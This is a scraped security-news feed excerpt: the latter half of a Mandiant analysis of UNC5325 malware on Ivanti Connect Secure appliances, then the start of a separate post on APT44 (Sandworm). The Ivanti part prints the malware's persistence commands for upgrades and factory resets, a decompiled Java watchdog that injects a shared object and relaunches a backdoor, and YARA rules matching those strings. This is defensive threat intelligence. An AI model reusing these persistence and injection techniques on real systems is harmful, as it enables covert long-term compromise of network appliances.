<div class="block-paragraph_advanced"><pre class="language-plain"><code>(cd / ; tar -zxBf /data/pkg/data-backup.tgz &gt;/dev/null 2&gt;&amp;1)</code></pre>
<p><span><em><span>Figure 9: Decompression of </span><code>data-backup.tgz</code><span> during system upgrade events</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>In addition, the malware contains a function named <code>upgrade_monitor()</code> that supports persistence across system upgrade and patch events. We assess that this acts as a secondary persistence method by making a modification at the precise moment of a system upgrade or patch event.</p>
<p>It monitors for system upgrade events by continually checking the filesystem for the existence of <code>/tmp/data/root/dev</code>. This path is used to support a system upgrade process. In other words, the presence of the path indicates to the malware the existence of a system upgrade event.</p>
<p>If the path exists, it intervenes the system upgrade process by appending itself and its constituent components into the archive <code>/tmp/data/root/samba_upgrade.tar</code>. During a system upgrade process, the appliance decompresses <code>samba_upgrade.tar</code> for data migration purposes. Figure 10 provides the command executed by <code>upgrade_monitor()</code> when it detects the existence of <code>/tmp/data/root/dev</code>.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>tar -rf /tmp/data/root/samba_upgrade.tar 
/home/runtime/SparkGateway/plugin.jar 
/home/runtime/SparkGateway/libchilkat.so 
/home/runtime/SparkGateway/gateway.conf  &gt; /dev/null 2&gt;&amp;1</code></pre>
<p><span><em><span>Figure 10: Shell command executed by </span><code>upgrade_monitor()</code></em></span></p></div>
<div class="block-paragraph_advanced"><p>During the system upgrade or patch process, the <code>post-install</code> bash script executes the following to decompress <code>samba_upgrade.tar</code>, copying the malicious components (<code>libchilkat.so</code>, <code>plugin.jar</code>, and <code>gateway.conf</code>) to the new active partition. Figure 11 provides the relevant command sequence from <code>post-install</code>.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>tar -tf $upgrade_partition samba_upgrade.tar &gt; /dev/null 2&gt;&amp;1
if [ $? -eq 0 ]; then
    (cd /; tar -xf $upgrade_partition samba_upgrade.tar &gt;/dev/null)
fi</code></pre>
<p><span><em><span> Figure 11: Decompression of </span><code>samba_upgrade.tar</code><span> by </span><code>post-install</code><span> script</span></em></span></p></div>
<div class="block-paragraph_advanced"><h4>Attempted Persistence Across Factory Resets</h4>
<p>Next, LITTLELAMB.WOOLTEA executes <code>first_run()</code>, which reads and checks the hardware of the appliance by reading the first four (4) bytes of the motherboard serial number at <code>/proc/ive/mbserialnumber</code> and adjusts its behavior to mount the root partition of the factory reset image for further modification.</p>
<p>If the four (4) bytes match the strings <code>0331</code>, <code>0332</code>, <code>0340</code>, <code>0481</code>, or <code>0482</code>, the malware executes the following command to mount <code>/dev/md5</code> (factory reset root partition) on <code>/dev/loop5</code>.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>/bin/losetup /dev/loop5 /dev/md5 &gt; /dev/null 2&gt;&amp;1</code></pre>
<p><span><em><span>Figure 12: Command to set up loop device for block device </span><code>/dev/md5</code></em></span></p></div>
<div class="block-paragraph_advanced"><p>Each of the four-byte strings corresponds to a physical Pulse Secure Appliance (PSA) or a Ivanti Secure Appliance (ISA) product.<br><br></p>
<div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Machine ID</strong></p>
</td>
<td>
<p><strong>Appliance Model Number</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>0331</span></p>
</td>
<td>
<p><span>PSA 7000F</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0332</span></p>
</td>
<td>
<p><span>PSA 7000C</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0340</span></p>
</td>
<td>
<p><span>PSA 10000</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0481</span></p>
</td>
<td>
<p><span>ISA 8000F</span></p>
</td>
</tr>
<tr>
<td>
<p><span>0482</span></p>
</td>
<td>
<p><span>ISA 8000C</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><em><span>Table 2: Machine ID to physical appliance model number</span></em></span></p>
<p>Otherwise, the malware executes the following command to mount <code>/dev/xda5</code> (factory reset root partition) on <code>/dev/loop5</code> if the four (4) bytes do not match any of the machine ID strings or if it fails to read <code>/proc/ive/mbserialnumber</code>.</p>
</div></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>/bin/losetup /dev/loop5 /dev/xda5 &gt; /dev/null 2&gt;&amp;1</code></pre>
<p><span><em><span>Figure 13: Command to set up loop device for block device </span><code>/dev/xda5</code></em></span></p></div>
<div class="block-paragraph_advanced"><p>Next, LITTLELAMB.WOOLTEA mounts the newly created loop device (<code>/dev/loop5</code>) to <code>/tmp/tmpmnt</code> to modify the factory reset root partition. Figure 14 provides the equivalent command sequence.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>mkdir -m 777 /tmp/tmpmnt
mount /dev/loop5 /tmp/tmpmnt -t ext2</code></pre>
<p><span><em><span>Figure 14: Command to mount loop device </span><code>/dev/loop5</code></em></span></p></div>
<div class="block-paragraph_advanced"><p>It's important to note that <code>/bin/losetup</code> uses an embedded encryption key within the running version's kernel used to decrypt the running version's partition. This encryption key is hardcoded at the time of build compilation and is unique for each appliance version.</p>
<p>However, the factory reset partition maintains its own independent encryption key embedded in the factory kernel. If the current running version and the factory reset deployment versions differ (i.e., the appliance or VM has been updated at least once), then <code>/bin/losetup</code> will fail to decrypt the factory reset partition due to the encryption key mismatch and thus the malware will not persist after factory reset.</p>
<p>Note that Mandiant and Ivanti conducted forensic analysis on an affected appliance after factory reset to confirm no evidence of malware persistence. Because the appliance had undergone at least one update since its initial deployment, the malware failed to persist through the factory reset as the encryption key of the factory reset kernel and the running version kernel were different.</p>
<p>If <code>losetup</code> had succeeded in decrypting the factory reset image, the malware would continue its persistence workflow. To modify the factory reset process, it calls the <code>edit_factory_reset()</code> function that renames the <code>tar</code> binary to <code>tra</code> in the mounted factory reset partition.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>mv /tmp/tmpmnt/bin/tar /tmp/tmpmnt/bin/tra</code></pre>
<p><span><em><span>Figure 15: Command to rename </span><code>tar</code><span> binary</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>Then, the malware writes a trojanized version of the <code>tar</code> binary to <code>/tmp/tmpmnt/bin/tar</code>, makes the <code>tar</code> binary executable, and preemptively appends its malicious components (using the legitimate <code>tar</code> utility) to the archive <code>/tmp/tmpmnt/bin/samba_upgrade.tar</code> inside the factory reset partition.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>tar -rf /tmp/tmpmnt/bin/samba_upgrade.tar 
/home/runtime/SparkGateway/plugin.jar 
/home/runtime/SparkGateway/libchilkat.so 
/home/runtime/SparkGateway/gateway.conf  &gt; /dev/null 2&gt;&amp;1</code></pre>
<p><span><em><span>Figure 16: Command to archive components to </span><code>samba_upgrade.tar</code></em></span></p></div>
<div class="block-paragraph_advanced"><p>The trojanized <code>tar</code> binary checks for a set of specific conditions to copy the malicious <code>/bin/samba_upgrade.tar</code> to <code>/tmp/samba_upgrade.tar</code> during the factory reset process. </p>
<ul>
<li>There are four arguments provided (<code>argc</code> is equal to 4)</li>
<li>The second argument, <code>argv[1]</code>, is <code>-cf</code> </li>
<li>The fourth argument, <code>argv[3]</code>, is <code>no-data</code></li>
</ul>
<p>If any of these conditions are not met, the trojanized <code>tar</code> binary executes the legitimate <code>tar</code> (<code>/bin/tra</code>) utility backed up in Figure 15.</p>
<p>The conditions are satisfied by a component of the factory reset procedure responsible for resetting the configuration (<code>dsconfigreset</code>). The utility creates an empty file in <code>/tmp/no-data</code> and archives it using <code>/bin/tar -cf</code>. Figure 17 provides the relevant command sequence.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>echo "" &gt; /tmp/no-data
(cd /tmp; /bin/tar -cf $tmp_part no-data)</code></pre>
<p><span><em><span>Figure 17: Command executed during factory reset by </span><code>dsconfigreset</code></em></span></p></div>
<div class="block-paragraph_advanced"><p>When <code>dsconfigreset</code> executes <code>/bin/tar -cf $tmp_part no-data</code>, the trojanized <code>tar</code> copies the contents of <code>/bin/samba_upgrade.tar</code> containing its malicious components to <code>/tmp/samba_upgrade.tar</code> in the factory reset root partition (mounted on <code>/tmp/tmpmnt</code>).</p>
<p>Next, similar to the previously described system upgrade persistence flow, the appliance executes the <code>post-install</code> bash script during the installation process of the new system. This script decompresses the <code>samba_upgrade.tar</code> archive in the factory reset partition, copying the malicious components (<code>libchilkat.so</code>, <code>plugin.jar</code>, and <code>gateway.conf</code>) to the new active partition created after the factory reset.</p>
<h5>Hooking the Web Server Process</h5>
<p>The <code>httpd_monitor()</code> function ensures the persistent injection of another shared object, <code>libaprhelper.so</code> (PITSOCK), into the <code>web</code> process using a built-in injection function named <code>inject_loop()</code>. </p>
<p>PITSOCK hooks the functions <code>accept</code> and <code>setsockopt</code> of the <code>web</code> process by modifying its procedure linkage table (PLT). This enables backdoor communication via the Unix socket <code>/tmp/clientsDownload.sock</code> when it receives a specific 48-byte magic byte sequence in the incoming buffer.</p>
<h5>Creating the Malicious SparkGateway Plugin</h5>
<p>Lastly, <code>libchilkat.so</code> calls <code>persist()</code>, which modifies the SparkGateway configuration file. Figure 18 shows an excerpt from the modified SparkGateway configuration file to support and load the plugin.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>plugin = com.toremote.gateway.plugin.PluginManager
pluginFile = /home/runtime/SparkGateway/plugin.jar</code></pre>
<p><span><em><span>Figure 18: Excerpt of SparkGateway configuration file</span></em></span></p></div>
<div class="block-paragraph_advanced"><h5>Backdoor Features</h5>
<p><code>libchilkat.so</code> also serves as a stand-alone backdoor that supports expected features such as command execution, file management, shell creation, SOCKS proxy, and network traffic tunneling. It communicates over SSL using the private key located on the Ivanti Connect Secure web server (<code>/home/webserver/conf/ssl.key/secure.key</code>) and communicates using the socket <code>/tmp/clientsDownload.sock</code>.</p>
<h4>PITDOG Plugin</h4>
<p>Mandiant identified a second malicious SparkGateway plugin named <code>security.jar</code> (PITDOG) that uses <a href="https://github.com/kubo/injector" rel="noopener" target="_blank"><u>Kubo Injector</u></a> (<code>memorysCounter</code>) to inject a shared object, <code>mem.rd</code> (PITHOOK), into the <code>web</code> process memory, and persistently executes a backdoor, <code>dsAgent</code> (PITSTOP). Figure 19 shows the relevant excerpts from <code>security.jar</code>.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>public class SparkPlugin implements ManagerInterface {
  public static void watchdog() {
    try {
      Thread.sleep(300000L);
      ProcessBuilder processBuilder = new ProcessBuilder(new String[0]);
      Process process = Runtime.getRuntime().exec(new String[] { "/bin/sh", 
"-c", "ps aux|grep '/home/bin/web'|grep -v grep | 
awk '{if (NR!=1) {print $2}}'" });
      BufferedReader reader = new BufferedReader(new InputStreamReader
(process.getInputStream()));
      String line;
      while ((line = reader.readLine()) != null) {
        int procnum = Integer.parseInt(line);
        String catprocstr = String.format("cat /proc/%d/maps | grep mem.rd", 
new Object[] { Integer.valueOf(procnum) });
        Process processinjectres = Runtime.getRuntime().exec(new String[] 
{ "/bin/sh", "-c", catprocstr });
        BufferedReader processinjectreader = new BufferedReader(new 
InputStreamReader(processinjectres.getInputStream()));
        if ((line = processinjectreader.readLine()) == null) {
          String processinjectstr = String.format("/data/runtime/cockpit
/memorysCounter -p %d /data/runtime/cockpit/mem.rd", new Object[] 
{ Integer.valueOf(procnum) });
          Process process1 = Runtime.getRuntime().exec(new String[] 
{ "/bin/sh", "-c", processinjectstr });
        } 
      } 
      Process processps = Runtime.getRuntime().exec(new String[] 
{ "/bin/sh", "-c", "ps aux|grep '/data/runtime/cockpit/dsAgent'|grep 
-v grep | awk '{print $2}'" });
      BufferedReader readerps = new BufferedReader(new 
InputStreamReader(processps.getInputStream()));
      if ((line = readerps.readLine()) == null) {
        Process processinjectres = Runtime.getRuntime().exec("rm 
-f /data/runtime/cockpit/wd.lock");
        ProcessBuilder processBuilder1 = (new ProcessBuilder(new 
String[] { "/data/runtime/cockpit/dsAgent" })).redirectErrorStream(true);
        Process process1 = processBuilder1.start();
      } 
    } catch (Exception exception) {}
  }
  
  public HandshakeInterface getHandshakePlugin() {
    long timeInterval = 10000L;
    Runnable runnable = new Runnable() {
        public void run() {
          while (true) {
            SparkPlugin.watchdog();
            try {
              Thread.sleep(10000L);
            } catch (InterruptedException e) {
              e.printStackTrace();
            } 
          } 
        }
      };
    Thread thread = new Thread(runnable);
    thread.start();
    return null;
  }</code></pre>
<p><span><em><span>Figure 19: Excerpt of security.jar plugin</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>The SparkGateway configuration is modified to load the plugin. Figure 20 shows the relevant excerpt from <code>gateway.conf</code>.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>plugin = SparkPlugin
pluginFile = /data/runtime/cockpit/security.jar</code></pre>
<p><span><em><span>Figure 20: Excerpt of SparkGateway configuration file</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>The <code>security.jar</code> plugin is executed during the negotiation of an RDP connection when the system invokes the Handshake plugin. The <code>getHandshakePlugin()</code> method creates a new thread from a Runnable interface that repeatedly calls <code>SparkPlugin.watchdog()</code> every ten (10) seconds. This acts as a persistence method to ensure the continuous execution of the malicious <code>watchdog</code> method without interfering with the primary operation of the SparkGateway application.</p>
<p>The <code>watchdog</code> method first checks if the shared object <code>mem.rd</code> (PITHOOK) is mapped within the <code>web</code> process memory. If not, it injects <code>mem.rd</code> into the <code>web</code> process.</p>
<p>Figure 21 shows the command executed to inject PITHOOK (<code>mem.rd</code>) into the web process, where <code>%d</code> represents the process ID (PID) of the <code>web</code> process.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>/data/runtime/cockpit/memorysCounter -p %d /data/runtime/cockpit/mem.rd</code></pre>
<p><span><em><span>Figure 21: Command to inject PITHOOK</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>We determined that <code>/data/runtime/cockpit/memorysCounter</code> is a direct instance of <a href="https://github.com/kubo/injector" rel="noopener" target="_blank"><u>Kubo Injector</u></a> without any additional modifications or changes. Kubo Injector is based on the popular <a href="https://github.com/gaffe23/linux-inject" rel="noopener" target="_blank"><u>linux-inject</u></a> project, a utility that can inject a shared object into an arbitrary process given a process name or process ID.</p>
<p><span>PITHOOK hooks the </span><code>accept</code><span> and </span><code>accept4</code><span> functions within the </span><code>web</code><span> process by modifying the PLT. When PITHOOK receives a buffer matching the predefined magic byte sequence, it will duplicate the socket and forward </span><span>it to PITSTOP over the</span><span> Unix domain socket </span><code>/data/runtime/cockpit/wd.fd</code><span>.</span></p>
<p>Lastly, the <code>watchdog</code> method will execute the PITSTOP backdoor (<code>/data/runtime/cockpit/dsAgent</code>) if it is not already running.</p>
<p>PITSTOP creates and listens on the Unix domain socket located at <code>/data/runtime/cockpit/wd.fd</code>. It waits to receive a socket forwarded by PITHOOK after receiving the predefined magic byte sequence. Then PITSTOP duplicates the socket for further communication over TLS. When the TLS connection is established, PITSTOP uses Base64 and a hard-coded AES key to evaluate the incoming command. It supports shell command execution, file write, and file read on the compromised appliance.</p>
<h2>Outlook and Implications</h2>
<p>UNC5325’s TTPs and malware deployment showcase the capabilities that <a href="https://cloud.google.com/blog/topics/threat-intelligence/chinese-espionage-tactics" rel="noopener" target="_blank"><u>suspected China-nexus espionage actors</u></a> have continued to leverage against edge infrastructure in conjunction with zero days. Similar to <a href="https://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation" rel="noopener" target="_blank"><u>UNC4841</u></a>’s familiarity with Barracuda ESGs, UNC5325 demonstrates significant knowledge of the Ivanti Connect Secure appliance as seen in both the malware they used and the attempts to persist across factory resets. Mandiant expects UNC5325 as well as other China-nexus espionage actors to continue to leverage zero day vulnerabilities on network edge devices as well as <a href="https://cloud.google.com/blog/topics/threat-intelligence/fortinet-malware-ecosystem" rel="noopener" target="_blank"><u>appliance-specific malware </u></a>to gain and maintain access to target environments.</p>
<h6><em>The material in this blog post is being shared as cyber threat indicators and defensive measures solely for cybersecurity purposes in accordance with the Cybersecurity Information Sharing Act of 2015 (“CISA/2015”).  This information is subject to the provisions of CISA/2015, including 6 U.S. Code § 1504(d)(1).</em></h6></div>
<div class="block-paragraph_advanced"><h2><span>Indicators of Compromise (IOCs)</span></h2>
<h3><span>Host-Based Indicators (HBIs)</span></h3>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col></colgroup>
<thead>
<tr>
<th scope="col">
<p><strong>Filename</strong></p>
</th>
<th scope="col">
<p><strong>MD5</strong></p>
</th>
<th scope="col">
<p><strong>Description</strong></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<p><code>DSUserAgentCap.pm</code></p>
</td>
<td>
<p><span>e4fe3a314a3aee5aee9c55787a33671c</span></p>
</td>
<td>
<p><span>BUSHWALK activator / deactivator</span></p>
</td>
</tr>
<tr>
<td>
<p><code>querymanifest.cgi</code></p>
</td>
<td>
<p><span>e48716521dc48425feae71bc9dc768cd</span></p>
</td>
<td>
<p><span>BUSHWALK variant</span></p>
</td>
</tr>
<tr>
<td>
<p><code>diskCounters</code></p>
</td>
<td>
<p><span>8c4b32e8ee9e0b2f8dab01364971ffff</span></p>
</td>
<td>
<p><span>Dropper for DSUserAgentCap.pm</span></p>
</td>
</tr>
<tr>
<td>
<p><code>diskmonitor</code></p>
</td>
<td>
<p><span>e33a3a90f1f8fa6d8f17bc6151b027d6</span></p>
</td>
<td>
<p><span>Encrypted DSUserAgentCap.pm</span></p>
</td>
</tr>
<tr>
<td>
<p><code>diskAnalysis</code></p>
</td>
<td>
<p><span>6c58b8b1e3b36a5a124afd110c109ebc</span></p>
</td>
<td>
<p><span>Encrypted BUSHWALK variant</span></p>
</td>
</tr>
<tr>
<td>
<p><code>plugin.jar</code></p>
</td>
<td>
<p><span>b76d7890a7a7ff6d0b1151a8251e318f</span></p>
</td>
<td>
<p><span>PITFUEL SparkGateway plugin</span></p>
</td>
</tr>
<tr>
<td>
<p><code>gateway.conf</code></p>
</td>
<td>
<p><span>9e0941c4851d414b5d25dd15872c3e47</span></p>
</td>
<td>
<p><span>SparkGateway config to load PITFUEL</span></p>
</td>
</tr>
<tr>
<td>
<p><code>libchilkat.so</code></p>
</td>
<td>
<p><span>fd83b3e9db57838b62c5baf8218ce5a8</span></p>
</td>
<td>
<p><span>LITTLELAMB.WOOLTEA backdoor</span></p>
</td>
</tr>
<tr>
<td>
<p><code>libaprhelper.so</code></p>
</td>
<td>
<p><span>2ddeca6511506fe435dc1f63b4cf061c</span></p>
</td>
<td>
<p><span>PITSOCK backdoor</span></p>
</td>
</tr>
<tr>
<td>
<p><code>security.jar</code></p>
</td>
<td>
<p><span>f64a799ff16aded3f4d6706ffbd7e6dd</span></p>
</td>
<td>
<p><span>PITDOG SparkGateway plugin</span></p>
</td>
</tr>
<tr>
<td>
<p><code>gateway.conf</code></p>
</td>
<td>
<p><span>fb973c8bbfdba234ea83ee20084dcac9</span></p>
</td>
<td>
<p><span>SparkGateway config to load PITDOG</span></p>
</td>
</tr>
<tr>
<td>
<p><code>mem.rd</code></p>
</td>
<td>
<p><span>5368b1122c10fa7850f44d3e16fc18fb</span></p>
</td>
<td>
<p><span>PITHOOK backdoor</span></p>
</td>
</tr>
<tr>
<td>
<p><code>memorysCounter</code></p>
</td>
<td>
<p><span>31a591a28198f05e9ab4d12609a9ce81</span></p>
</td>
<td>
<p><span>Kubo Injector</span></p>
</td>
</tr>
<tr>
<td>
<p><code>dsAgent</code></p>
</td>
<td>
<p><span>5f561f217a8046de8cadf418ef4dfda0</span></p>
</td>
<td>
<p><span>PITSTOP backdoor</span></p>
</td>
</tr>
<tr>
<td>
<p><code>wd.fd</code></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>Unix domain socket for PITSTOP</span></p>
</td>
</tr>
<tr>
<td>
<p><code>wd.lock</code></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>Mutex for PITSTOP</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><em><span>Table 3: Host-based indicators</span></em></span></p>
<h2><span>YARA Rules</span></h2>
</div></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Launcher_PITDOG_1 {
  meta:
    author = "Mandiant"
    description = "This rule is designed to detect on events 
related to PITDOG."
	strings:
		$str2 = "cat /proc/%d/maps | grep mem.rd"
		$str3 = "/data/runtime/cockpit/memorysCounter 
-p %d /data/runtime/cockpit/mem.rd"
		$str4 = "rm -f /data/runtime/cockpit/wd.lock"
		$str5 = "/data/runtime/cockpit/dsAgent"
		$str6 = "watchdog"
		$str7 = "ps aux|grep '/home/bin/web'|grep -v grep 
| awk '{if (NR!=1) {print $2}}'"
condition:
	uint32(0) == 0xBEBAFECA and all of them
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Utility_PITHOOK_1 {
  meta:
    author = " Mandiant"
    description = "This rule is designed to detect on events 
related to PITHOOK."
	strings:
		$str1 = "/data/runtime/cockpit/wd.fd"
		$str2 = "/proc/self/maps"
		$str3 = "plthook_open"
		$str4 = "plthook_replace"
		$str5 = "plthook_close"
		$str6 = "plthook_open_by_handle"
		$str7 = "plthook_open_by_address"
		$str8 = "plthook_enum"
		$str9 = "plthook_error"
		$str10 = "accept4_hook"
	condition:
		uint32(0) == 0x464C457F and all of them
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Hunting_Webshell_BUSHWALK_1 {
  meta:
    author = "Mandiant"
    description = "This rule detects BUSHWALK, a webshell 
written in Perl CGI that is embedded into a legitimate 
Pulse Secure file to enable file transfers"
  strings:
    $s1 = "SafariiOS" ascii
    $s2 = "command" ascii
    $s3 = "change" ascii
    $s4 = "update" ascii
    $s5 = "$data = RC4($key, $data);" ascii
  condition:
    filesize &lt; 5KB
    and all of them
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Hunting_Launcher_PITFUEL_1 {
    meta:
		author = "Mandiant"
		description = "This rule detects class used in 
PITFUEL, a malicious JAR-based launcher that loads malicious code"
	strings:
		$h1 = {50 4B 03 04}
		$s1 = "com/toremote/gateway/plugin/PluginManager.class"
	condition:
		$h1 at 0 and for any i in (0..#h1): ($s1 in (@h1[i]..@h1[i]+80))
}
</code></pre></div>
<div class="block-paragraph_advanced"><h2>Mandiant Security Validation Actions</h2>
<p>Organizations can validate their security controls using the following actions with <a href="https://cloud.google.com/security/products/threat-intelligence" rel="noopener" target="_blank"><u>Mandiant Security Validation</u></a>.<br><br></p>
<div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>VID</strong></p>
</td>
<td>
<p><strong>Name</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-935</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2023-46805, Authentication Bypass, Variant #1</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-934</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-21887, Command Injection, Variant #1</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-936</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-21887, Command Injection, Variant #2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-986</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-21893, Exploitation, Variant #1</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A107-055</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-22024, Exploitation, Variant #1</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A107-060</span></p>
</td>
<td>
<p><span>Malicious File Transfer - BUSHWALK, Download, Variant #1</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Unearthing APT44: Russia’s Notorious Cyber Sabotage Unit Sandworm]]></title>
<description><![CDATA[Written by: Gabby Roncone, Dan Black, John Wolfram, Tyler McLellan, Nick Simonian, Ryan Hall, Anton Prokopenkov, Luke Jenkins, Dan Perez, Lexie Aytes, Alden Wahlstrom

 
With Russia's full-scale invasion in its third year, Sandworm (aka FROZENBARENTS) remains a formidable threat to Ukraine. The g...]]></description>
<link>https://tsecurity.de/de/3578867/it-security-nachrichten/unearthing-apt44-russias-notorious-cyber-sabotage-unit-sandworm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578867/it-security-nachrichten/unearthing-apt44-russias-notorious-cyber-sabotage-unit-sandworm/</guid>
<pubDate>Sun, 07 Jun 2026 08:22:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by:<em> </em><span>Gabby Roncone, Dan Black, John Wolfram, Tyler McLellan, Nick Simonian, Ryan Hall, Anton Prokopenkov, Luke Jenkins, Dan Perez, Lexie Aytes, Alden Wahlstrom</span></p>
<hr>
<p> </p></div>
<div class="block-paragraph_advanced"><p><span>With Russia's full-scale invasion in its third year, Sandworm (aka FROZENBARENTS) remains a formidable threat to Ukraine. The group’s operations in support of Moscow’s war aims have proven tactically and operationally adaptable, and as of today, appear to be better integrated with the activities of Russia’s conventional forces than in any other previous phase of the conflict. To date, no other Russian government-backed cyber group has played a more central role in shaping and supporting Russia’s military campaign. </span></p>
<p><span>Yet the threat posed by Sandworm is far from limited to Ukraine. Mandiant continues to see operations from the group that are global in scope in key political, military, and economic hotspots for Russia. Additionally, with a record number of people participating in national elections in 2024, Sandworm’s history of attempting to interfere in democratic processes further elevates the severity of the threat the group may pose in the near-term. </span></p>
<p><span>Given the active and diffuse nature of the threat posed by Sandworm globally, Mandiant has decided to graduate the group into a named Advanced Persistent Threat: </span><strong>APT44</strong><span>. As part of this process, we are releasing a report, “</span><a href="https://services.google.com/fh/files/misc/apt44-unearthing-sandworm.pdf" rel="noopener" target="_blank"><span>APT44: Unearthing Sandworm</span></a><span>”, that provides additional insights into the group’s new operations, retrospective insights, and context on how the group is adjusting to support Moscow’s war aims.</span></p>
<h2><span>Key Findings </span></h2>
<p><strong>Sponsored by Russian military intelligence, APT44 is a dynamic and operationally mature threat actor that is actively engaged in the full spectrum of espionage, attack, and influence operations. </strong><span>While most state-backed threat groups tend to specialize in a specific mission such as collecting intelligence, sabotaging networks, or conducting information operations, APT44 stands apart in how it has honed each of these capabilities and sought to integrate them into a </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/gru-disruptive-playbook"><span>unified playbook</span></a><span> over time. Each of these respective components, and APT44’s efforts to blend them for combined effect, are foundational to Russia’s guiding “information confrontation” concept for cyber warfare.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/apt44-fig1.max-1000x1000.jpg" alt="APT44’s Spectrum of Operations">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="q4izg">Figure 1: APT44’s spectrum of operations</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><strong>APT44 has aggressively pursued a multi-pronged effort to help the Russian military gain a wartime advantage and is responsible for nearly all of the disruptive and destructive operations against Ukraine over the past decade. </strong><span>Throughout Russia’s war, APT44 has waged a </span><a href="https://blog.google/threat-analysis-group/fog-of-war-how-the-ukraine-conflict-transformed-the-cyber-threat-landscape/" rel="noopener" target="_blank"><span>high intensity campaign</span></a><span> of cyber sabotage inside of Ukraine. Through the use of disruptive cyber tools, such as wiper malware designed to disrupt systems, APT44 has sought to impact a wide range of critical infrastructure sectors. At times, these operations have been coordinated with conventional military activity, such as kinetic strikes or other forms of sabotage, in an attempt to achieve joint military objectives. </span></p>
<p><span>However, as the war has endured, APT44’s relative focus has transitioned away from disruption to intelligence collection. The group’s targets and methods have shifted significantly in the second year of the war, with increasing emphasis placed on espionage activity intended to provide battlefield advantage to Russia’s conventional forces. For example, one long-running APT44 campaign has assisted forward-deployed Russian ground forces to exfiltrate communications from captured mobile devices in order to collect and process relevant targeting data. APT44’s approach to supporting Russia’s military campaign has evolved considerably over the past two years.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/apt44-fig2.max-1000x1000.jpg" alt="APT44’s Wartime Disruptive Activity">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="q4izg">Figure 2: APT44’s wartime disruptive activity</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><strong>We assess with high confidence that APT44 is seen by the Kremlin as a flexible instrument of power capable of servicing Russia's wide ranging national interests and ambitions, including efforts to undermine democratic processes globally.  </strong></p>
